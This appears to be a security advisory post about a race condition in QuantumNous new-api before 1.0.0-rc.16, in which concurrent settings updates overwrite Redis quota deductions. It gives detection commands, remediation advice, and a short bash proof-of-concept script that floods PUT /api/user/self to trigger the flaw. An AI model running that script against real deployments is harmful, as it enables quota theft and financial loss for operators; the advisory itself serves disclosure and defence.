Listen to this Post
New API is an LLM gateway and AI asset management system. Prior to version 1.0.0-rc.16, the application contains a race condition vulnerability that allows authenticated low-privileged users to bypass quota enforcement. The flaw resides in the user settings update endpoint (PUT /api/user/self).
When a user updates fields like `language` or sidebar_modules, the `controller/user.go` calls User.Update. This function reads a full snapshot of the User object and writes it back to the Redis cache using `RedisHSetObj` in model/user_cache.go. This operation performs a full hash write (HSET) on the user’s cache key, including the `Quota` field.
Simultaneously, the normal billing process deducts quota using atomic `HINCRBY` operations on the same Redis field. Due to improper synchronization, the full hash write from the settings update can overwrite and erase the concurrent `HINCRBY` deductions. This race condition allows an attacker to keep their cached quota artificially high, enabling the consumption of services far beyond their paid limit. The vulnerability is classified under CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (‘Race Condition’).
DailyCVE Form:
Platform: QuantumNous new-api
Version: < 1.0.0-rc.16
Vulnerability: Race Condition
Severity: Medium (CVSS 6.0)
date: 2026-08-17
Prediction: 2026-08-18
What Undercode Say:
Analytics
To identify if a deployment is vulnerable, operators can check the application version and monitor logs for frequent `PUT /api/user/self` requests.
Check the deployed version
Example using a package manager or checking the binary version
./new-api --version
Monitor for suspiciously high frequency of settings updates
This command can be adapted to grep access logs for the endpoint
grep "PUT /api/user/self" /var/log/new-api/access.log | awk '{print $1}' | sort | uniq -c | sort -nr
Exploit: (Educational Purposes!)
The following conceptual bash script demonstrates how an attacker could repeatedly trigger the race condition.
!/bin/bash
This script is for educational purposes only to demonstrate CVE-2026-64865.
API_URL="https://target-instance.com/api/user/self"
AUTH_TOKEN="Bearer <valid_jwt_token>"
Function to send a request that triggers the vulnerable code path
trigger_race_condition() {
curl -X PUT "$API_URL" \
-H "Authorization: $AUTH_TOKEN" \
-H "Content-Type: application/json" \
-d '{"language": "en-US"}' \
-s -o /dev/null -w "Request sent. Status: %{http_code}\n"
}
echo "Sending repeated requests to trigger the race condition..."
for i in {1..100}; do
trigger_race_condition &
done
wait
echo "Race condition exploitation attempt completed."
Protection: from this CVE
Upgrading to version `v1.0.0-rc.16` or later is the primary and recommended remediation. The fix makes user setting updates field-scoped and prevents stale user snapshots from overwriting accounting fields like Quota. As a workaround, if an immediate upgrade is not possible, operators should restrict or rate-limit the `PUT /api/user/self` endpoint.
Impact
A low-privileged authenticated user can exploit this vulnerability to bypass quota enforcement, leading to financial loss for the service operator. While the cached quota is artificially inflated, the actual database and log usage can continue to increase, resulting in unbilled resource consumption.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

